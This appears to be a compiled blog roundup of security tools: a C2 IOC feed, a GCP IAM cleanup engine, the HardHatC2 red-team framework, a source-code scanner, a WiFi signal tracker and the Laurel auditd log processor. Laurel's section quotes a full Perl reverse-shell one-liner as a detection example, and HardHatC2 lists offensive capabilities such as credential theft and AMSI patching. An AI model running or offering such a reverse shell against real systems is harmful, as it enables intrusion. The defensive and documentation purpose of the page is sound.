
C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

By: Zion3R


Free-to-use IOC feed for various tools/malware. It started out tracking just C2 tools but has morphed into tracking infostealers and botnets as well. It uses Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. I am actively working on making the backend more reliable.


Honorable Mentions

Many of the Shodan queries have been sourced from other CTI researchers:

Huge shoutout to them!

Thanks to BertJanCyber for creating the KQL query for ingesting this feed

And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

What do I track?

Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

echo SHODAN_API_KEY=API_KEY >> ~/.bashrc

python3 -m pip install -r requirements.txt
python3 tracker.py
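
The collection logic amounts to running a Shodan query and writing the matching IPs to a per-tool text file. A minimal sketch of that idea in Python, assuming the official shodan library and a hypothetical query (the real tracker.py covers many curated queries and more error handling):

import os
import shodan

# Read the API key from the environment variable configured above.
api = shodan.Shodan(os.environ["SHODAN_API_KEY"])

# Hypothetical example query; the actual feed uses many curated queries per tool.
QUERY = 'product:"Cobalt Strike Beacon"'

results = api.search(QUERY)
ips = sorted({match["ip_str"] for match in results["matches"]})

# One IP per line, mirroring the per-tool .txt files and all.txt in data/.
with open("data/example_tool.txt", "w") as fh:
    fh.write("\n".join(ips) + "\n")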

Contributing

I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted; just know that fidelity is paramount (a high true-positive to false-positive ratio is the focus).




CureIAM - Clean Accounts Over Permissions In GCP Infra At Scale

By: Zion3R

Clean up over-permissioned IAM accounts on GCP infra in an automated way

CureIAM is an easy-to-use, reliable, and performant engine for enforcing the principle of least privilege on GCP cloud infra. It enables DevOps and security teams to quickly clean up accounts in GCP infra that have been granted more permissions than they require. CureIAM fetches recommendations and insights from the GCP IAM recommender, scores them, and enforces those recommendations automatically on a daily basis. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of the GCP IAM recommender APIs and the Cloudmarker framework.


Key features

Discover what makes CureIAM scalable and production grade.

  • Config driven: The entire workflow of CureIAM is config driven. Skip to the Config section to learn more about it.
  • Scalable: It is designed to scale because of its plugin-driven, multiprocess and multi-threaded approach.
  • Handles scheduling: Scheduling is embedded in the CureIAM code itself; configure the time, and CureIAM will run daily at that time.
  • Plugin driven: The CureIAM codebase is completely plugin oriented, which means one can plug and play the existing plugins or create new ones to add more functionality.
  • Tracks actionable insights: Every action that CureIAM takes is recorded for audit purposes. It can do that in a file store and in an Elasticsearch store, and you can build other store plugins to push the data to other stores for tracking purposes.
  • Scoring and enforcement: Every recommendation fetched by CureIAM is scored against various parameters, producing a couple of scores such as safe_to_apply_score, risk_score and over_privilege_score. Each score serves a different purpose: safe_to_apply_score, for example, identifies whether a recommendation can be applied automatically, based on the threshold set in the CureIAM.yaml config file (see the sketch after this list).

Usage

Since CureIAM is built with Python, you can run it locally with the commands below. Before running, make sure a configuration file is present at one of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml, and that a service account JSON file is present in the current directory, preferably named cureiamSA.json. This SA private key can be named anything, but for the Docker image build it is preferred to use this name. Make sure to reference this file in the config for GCP cloud.

# Install necessary dependencies
$ pip install -r requirements.txt

# Run CureIAM now
$ python -m CureIAM -n

# Run CureIAM process as scheduler
$ python -m CureIAM

# Check CureIAM help
$ python -m CureIAM --help

CureIAM can also be run inside a Docker environment; this is completely optional and can be used for CI/CD with a K8s cluster deployment.

# Build docker image from dockerfile
$ docker build -t cureiam .

# Run the image, as scheduler
$ docker run -d cureiam

# Run the image now
$ docker run -it cureiam -m cureiam -n

Config

The CureIAM.yaml configuration file is the heart of the CureIAM engine. Everything the engine does, it does based on the pipeline configured in this config file. Let's break this config down into different sections to make it look simpler.

  1. Let's configure the first section, which covers logging configuration and scheduler configuration.
  logger:
    version: 1

    disable_existing_loggers: false

    formatters:
      verysimple:
        format: >-
          [%(process)s]
          %(name)s:%(lineno)d - %(message)s
        datefmt: "%Y-%m-%d %H:%M:%S"

    handlers:
      rich_console:
        class: rich.logging.RichHandler
        formatter: verysimple

      file:
        class: logging.handlers.TimedRotatingFileHandler
        formatter: simple
        filename: /tmp/CureIAM.log
        when: midnight
        encoding: utf8
        backupCount: 5

    loggers:
      adal-python:
        level: INFO

    root:
      level: INFO
      handlers:
        - rich_console
        - file

  schedule: "16:00"

This subsection of the config uses the Rich logging module and schedules CureIAM to run daily at 16:00.
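
The daily run follows the usual pattern of the Python schedule library (pinned later in the changelog); a simplified sketch of that pattern, not CureIAM's exact code:

import time
import schedule

def run_audits():
    # Placeholder for kicking off the configured audit pipeline.
    print("Running CureIAM audits...")

# Equivalent of the schedule: "16:00" setting above.
schedule.every().day.at("16:00").do(run_audits)

while True:
    schedule.run_pending()
    time.sleep(60)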

  2. The next section configures the different modules which we might use in the pipeline. This falls under the plugins section in CureIAM.yaml. You can think of this section as the declaration of the different plugins.
  plugins:
    gcpCloud:
      plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
      params:
        key_file_path: cureiamSA.json

    filestore:
      plugin: CureIAM.plugins.files.filestore.FileStore

    gcpIamProcessor:
      plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
      params:
        mode_scan: true
        mode_enforce: true
        enforcer:
          key_file_path: cureiamSA.json
          allowlist_projects:
            - alpha
          blocklist_projects:
            - beta
          blocklist_accounts:
            - foo@bar.com
          allowlist_account_types:
            - user
            - group
            - serviceAccount
          blocklist_account_types:
            - None
          min_safe_to_apply_score_user: 0
          min_safe_to_apply_score_group: 0
          min_safe_to_apply_score_SA: 50

    esstore:
      plugin: CureIAM.plugins.elastic.esstore.EsStore
      params:
        # Change http to https later if your elastic are using https
        scheme: http
        host: es-host.com
        port: 9200
        index: cureiam-stg
        username: security
        password: securepassword

Each of these plugin declarations has to be of this form:

  plugins:
    <plugin-name>:
      plugin: <class-name-as-python-path>
      params:
        param1: val1
        param2: val2

For example, the esstore plugin above points to the class EsStore in the esstore module. All the params defined in the YAML have to match the parameters declared in the __init__() function of that plugin class.
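
For instance, a store plugin declared with params such as scheme, host and port would need a matching constructor. A hypothetical skeleton (not the actual CureIAM source) looks like this:

# Hypothetical plugin skeleton; the keyword arguments must mirror the YAML params block.
class EsStore:
    def __init__(self, scheme="http", host="localhost", port=9200,
                 index="cureiam-stg", username=None, password=None):
        self.url = f"{scheme}://{host}:{port}"
        self.index = index
        self.username = username
        self.password = password

    def write(self, record):
        # Push a single audit/enforcement record to the backing store.
        ...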

  3. Once the plugins are defined, the next step is to define the pipeline for auditing. It goes like this:
  audits:
    IAMAudit:
      clouds:
        - gcpCloud
      processors:
        - gcpIamProcessor
      stores:
        - filestore
        - esstore

Multiple audits can be created like this. The one created here is named IAMAudit, with four plugins in use: gcpCloud, gcpIamProcessor, filestore and esstore. Note these are the same plugin names defined in Step 2. Again, this only defines the pipeline; it does not run it. It will be considered for running with the definition in the next step.

  4. Tell CureIAM to run the audits defined in the previous step.
  run:
    - IAMAudit

And this makes up the entire configuration for CureIAM; you can find the full sample config in the repository. This config-driven pipeline concept is inherited from the Cloudmarker framework.

Dashboard

The JSON that is indexed in Elasticsearch using the Elasticsearch store plugin can be used to generate dashboards in Kibana.
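
Before building visualizations it can help to confirm that documents are actually landing in the index. A quick check with the elasticsearch Python client, using the index name and credentials from the sample config above (adjust to your environment):

from elasticsearch import Elasticsearch

es = Elasticsearch("http://es-host.com:9200", basic_auth=("security", "securepassword"))

# Count the records CureIAM has indexed so far.
print(es.count(index="cureiam-stg")["count"])

# Peek at one document to see which fields are available for Kibana visualizations.
hits = es.search(index="cureiam-stg", size=1)["hits"]["hits"]
print(hits[0]["_source"] if hits else "index is empty")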

Contribute

[Please do!] We are looking for any kind of contribution to improve CureIAM's core functionality and documentation. When in doubt, make a PR!

Credits

Gojek Product Security Team

Demo


=============

NEW UPDATES May 2023 0.2.0

Refactoring

  • Breaking down the large code into multiple small functions
  • Moving all plugins into the plugins folder: Esstore, files, Cloud and GCP
  • Adding fixes for zero-divide issues
  • Migration to the new major version of Elastic
  • Changed configuration in the CureIAM.yaml file
  • Tested with Python 3.9.x

Library Updates

Pinning library versions to avoid any backward-compatibility issues.

  • Elastic==8.7.0 # previously 7.17.9
  • elasticsearch==8.7.0
  • google-api-python-client==2.86.0
  • PyYAML==6.0
  • schedule==1.2.0
  • rich==13.3.5

Docker Files

  • Added a Docker Compose file for local Elastic and Kibana in the elastic folder
  • Added .env-ex; change .env-ex to .env before running Docker
  • Run Docker Compose with: docker-compose -f docker_compose_es.yaml up

Features

  • Added the capability to run a scan without applying the recommendations. By default, if mode_scan is false, mode_enforce won't run.
      mode_scan: true
      mode_enforce: false
  • Turn off the email function temporarily.


HardHatC2 - A C# Command And Control Framework

By: Zion3R


A cross-platform, collaborative, Command & Control framework written in C#, designed for red teaming and ease of use.

HardHat is a multiplayer C# .NET-based command and control framework. Designed to aid in red team engagements and penetration testing. HardHat aims to improve the quality of life factors during engagements by providing an easy-to-use but still robust C2 framework.
It contains three primary components: an ASP.NET teamserver, a Blazor .NET client, and C#-based implants.


Release Tracking

Alpha Release - 3/29/23. NOTE: HardHat is in alpha release; it will have bugs, missing features, and unexpected things will happen. Thank you for trying it, and please report back any issues or missing features so they can be addressed.

Community

Discord: Join the community to talk about HardHat C2, programming, red teaming and general cyber security things. The Discord community is also a great way to request help, submit new features, stay up to date on the latest additions, and submit bugs.

Features

Teamserver & Client

  • Per-operator accounts with account tiers to allow customized access control and features, including view-only guest modes, team-lead opsec approval(WIP), and admin accounts for general operation management.
  • Managers (Listeners)
  • Dynamic Payload Generation (Exe, Dll, shellcode, PowerShell command)
  • Creation & editing of C2 profiles on the fly in the client
  • Customization of payload generation
    • sleep time/jitter
    • kill date
    • working hours
    • type (Exe, Dll, Shellcode, ps command)
    • Included commands(WIP)
    • option to run confuser
  • File upload & Downloads
  • Graph View
  • File Browser GUI
  • Event Log
  • JSON logging for events & tasks
  • Loot tracking (Creds, downloads)
  • IOC tracing
  • Pivot proxies (SOCKS 4a, Port forwards)
  • Cred store
  • Autocomplete command history
  • Detailed help command
  • Interactive bash terminal command if the client is on Linux, or PowerShell on Windows; this allows automatic parsing and logging of terminal commands like proxychains
  • Persistent database storage of teamserver items (User accounts, Managers, Engineers, Events, tasks, creds, downloads, uploads, etc. )
  • Recon Entity Tracking (track info about users/devices, random metadata as needed)
  • Shared files for some commands (see teamserver page for details)
  • tab-based interact window for command issuing
  • table-based output option for some commands like ls, ps, etc.
  • Auto parsing of output from seatbelt to create "recon entities" and fill entries to reference back to later easily
  • Dark and light themes

Engineers

  • C# .NET framework implant for windows devices, currently only CLR/.NET 4 support
  • atm only one implant, but looking to add others
  • It can be generated as EXE, DLL, shellcode, or PowerShell stager
  • Rc4 encryption of payload memory & heap when sleeping (Exe / DLL only)
  • AES encryption of all network communication
  • ConfuserEx integration for obfuscation
  • HTTP, HTTPS, TCP, SMB communication
    • TCP & SMB can work P2P in a bind or reverse setups
  • Unique per implant key generated at compile time
  • multiple callback URI's depending on the C2 profile
  • P/Invoke & D/Invoke integration for windows API calls
  • SOCKS 4a support
  • Reverse Port Forward & Port Forwards
  • All commands run as async cancellable jobs
    • Option to run commands sync if desired
  • Inline assembly execution & inline shellcode execution
  • DLL Injection
  • Execute assembly & Mimikatz integration
  • Mimikatz is not built into the implant but is pushed when specific commands are issued
  • Various localhost & network enumeration tools
  • Token manipulation commands
    • Steal Token Mask(WIP)
  • Lateral Movement Commands
  • Jump (psexec, wmi, wmi-ps, winrm, dcom)
  • Remote Execution (WIP)
  • AMSI & ETW Patching
  • Unmanaged Powershell
  • Script Store (can load multiple scripts at once if needed)
  • Spawn & Inject
    • Spawn-to is configurable
  • run, shell & execute

Documentation

Documentation can be found at docs.

Getting Started

Prerequisites

  • Installation of the .net 7 SDK from Microsoft
  • Once installed, the teamserver and client are started with dotnet run

Teamserver

To configure the team server's starting address (where clients will connect), edit HardHatC2\TeamServer\Properties\LaunchSettings.json, changing the "applicationUrl": "https://127.0.0.1:5000" to the desired location and port. Start the teamserver with dotnet run from its top-level folder ../HrdHatC2/Teamserver/

HardHat Client

  1. When starting the client, set the target teamserver location by including it on the command line, for example dotnet run https://127.0.0.1:5000
  2. Open a web browser and navigate to https://localhost:7096/. If this works, you should see the login page.
  3. Log in with the HardHat_Admin user (the password is printed on first TeamServer startup).
  4. Navigate to the settings page & create a new user. If successful, a message should appear; you may then log in with that account to access the full client.

Contributions & Bug Reports

Code contributions are welcome; feel free to submit feature requests, pull requests, or send me your ideas on Discord.



SCodeScanner - Stands For Source Code Scanner, Where The User Can Scan Source Code For Finding Critical Vulnerabilities


SCodeScanner stands for Source Code Scanner, where the user can scan source code to find critical vulnerabilities. The main objective of this scanner is to find vulnerabilities inside source code before the code gets published to prod.


Features

  1. Supports the PHP language
  2. Supports the YAML language
  3. Passes results to bug-tracking services like Jira and also Slack (sending files to a group of multiple people at once)
  4. Gives results in JSON format, which can easily be consumed by any other program (see the sketch after this list)
  5. Works with rules. We only need to create rules when the target rule is not present in the php/yaml directory.
  6. Rules can scan advanced patterns
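
Because the report is plain JSON, it is easy to feed into other tooling. A small consumer sketch in Python; the file name and field names here are assumptions for illustration, so check the actual report structure produced by scscanner.py:

import json

# Load a report produced by scscanner.py (path and schema are assumed here).
with open("scscanner_report.json") as fh:
    findings = json.load(fh)

# Print one line per finding, ready to forward to a bug tracker or a Slack message.
for finding in findings:
    severity = finding.get("severity", "?")
    location = finding.get("file", "?")
    rule = finding.get("rule", "?")
    print(f"{severity}: {location} -> {rule}")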

Achievements

SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.

  • CVE-2022-1465
  • CVE-2022-1474
  • CVE-2022-1527
  • CVE-2022-1532
  • CVE-2022-1604

How to run?

  • Download the repository -
  • Run pip3 install -r requirements.txt
  • And run python3 scscanner.py --help

Feedback/Improvements

I would love to hear your feedback on this tool. Open an issue if you find any problems, and open a PR if you have something to add.

Contact

Utkarsh Agrawal
Website



dBmonster - Track WiFi Devices With Their Received Signal Strength


With dBmonster you are able to scan for nearby WiFi devices and track them through the signal strength (dBm) of their sent packets (sniffed with TShark). These dBm values are plotted on a graph with matplotlib. It can help you to identify the exact location of nearby WiFi devices (use a directional WiFi antenna for the best results) or to find out how your self-made antenna performs best (antenna radiation patterns).
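
The underlying idea is simple: read the per-packet signal strength that TShark reports and plot it over time. A stripped-down sketch of that approach (assuming a monitor-mode interface named wlan0mon, a hypothetical target MAC address and the wlan_radio.signal_dbm field of recent TShark versions); it is not dBmonster's actual code:

import subprocess
import matplotlib.pyplot as plt

TARGET_MAC = "aa:bb:cc:dd:ee:ff"  # hypothetical device to track

# Ask TShark for the source MAC and signal strength of every sniffed frame.
cmd = [
    "tshark", "-i", "wlan0mon", "-l",
    "-T", "fields", "-e", "wlan.sa", "-e", "wlan_radio.signal_dbm",
]
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, text=True)

dbm_values = []
for line in proc.stdout:
    parts = line.strip().split("\t")
    if len(parts) == 2 and parts[0].lower() == TARGET_MAC and parts[1]:
        dbm_values.append(int(float(parts[1])))
        if len(dbm_values) >= 200:  # stop after a fixed number of samples
            break
proc.terminate()

# Plot signal strength over packet index.
plt.plot(dbm_values)
plt.xlabel("packet")
plt.ylabel("signal strength (dBm)")
plt.show()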


Features on Linux and MacOS

Feature                   Linux  MacOS
Listing WiFi interfaces    ✅     ✅
Track & scan on 2.4GHz     ✅     ✅
Track & scan on 5GHz       ✅     ✅
Scanning for AP            ✅     ✅
Scanning for STA           ✅
Beep when device found     ❓     ✅

Installation

git clone https://github.com/90N45-d3v/dBmonster
cd dBmonster

# Install required tools (On MacOS without sudo)
sudo python requirements.py

# Start dBmonster
sudo python dBmonster.py

Has been successfully tested on...

Platform          WiFi Adapter
Kali Linux        ALFA AWUS036NHA, DIY Bi-Quad WiFi Antenna
MacOS Monterey    Internal card 802.11 a/b/g/n/ac (MBP 2019)

* should work on any MacOS or Debian based system and with every WiFi card that supports monitor-mode

Troubleshooting for MacOS

Normally, you can only enable monitor-mode on the internal WiFi card of MacOS with Apple's airport utility. Somehow, Wireshark (or here TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wireshark's workaround, there are many issues running dBmonster on MacOS. After some time it could freeze, and/or you have to stop dBmonster/TShark manually from the CLI with the ps command. If you want to run it anyway, here are some helpful tips:

Kill dBmonster, if you can't stop it over the GUI

Look if there are any processes, named dBmonster, tshark or python:

sudo ps -U root

Now kill them with the following command:

sudo kill <PID OF PROCESS>

Stop monitor-mode, if it's enabled after running dBmonster

sudo airport <WiFi INTERFACE NAME> sniff

Press control + c after a few seconds

* Please contact me on Twitter if you have any more problems

Working on...

  • Capture signal strength data for offline graphs
  • Generate graphs from normal wireshark.pcapng file
  • Generate multiple graphs in one coordinate system

Additional information

  • If the tracked WiFi device is out of range or doesn't send any packets, the graph stops plotting till there is new data. So don't panic ;)
  • dBmonster wasn't tested on all systems... If there are any errors or something is going wrong, contact me.
  • If you used dBmonster on a non-listed Platform or WiFi Adapter, please open an issue (with Platform and WiFi Adapter information) and I will add your specification to the README.md


Laurel - Transform Linux Audit Logs For SIEM Usage


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.
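
To see why the hex encoding is painful without tooling: an argument such as a2 in the EXECVE record above is just ASCII rendered as hex. Decoding a prefix of it by hand in Python (the full value is truncated in the example):

# Prefix of the a2 value from the EXECVE example above.
hex_arg = "75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B"

print(bytes.fromhex(hex_arg).decode())
# -> use Socket;$i="10.0.0.1";$p=1234;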

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event records are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as labels to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis when filtering out harmless events.

Consider the following rule that sets a key for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_mgmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <hello@biggi.io>.



โŒ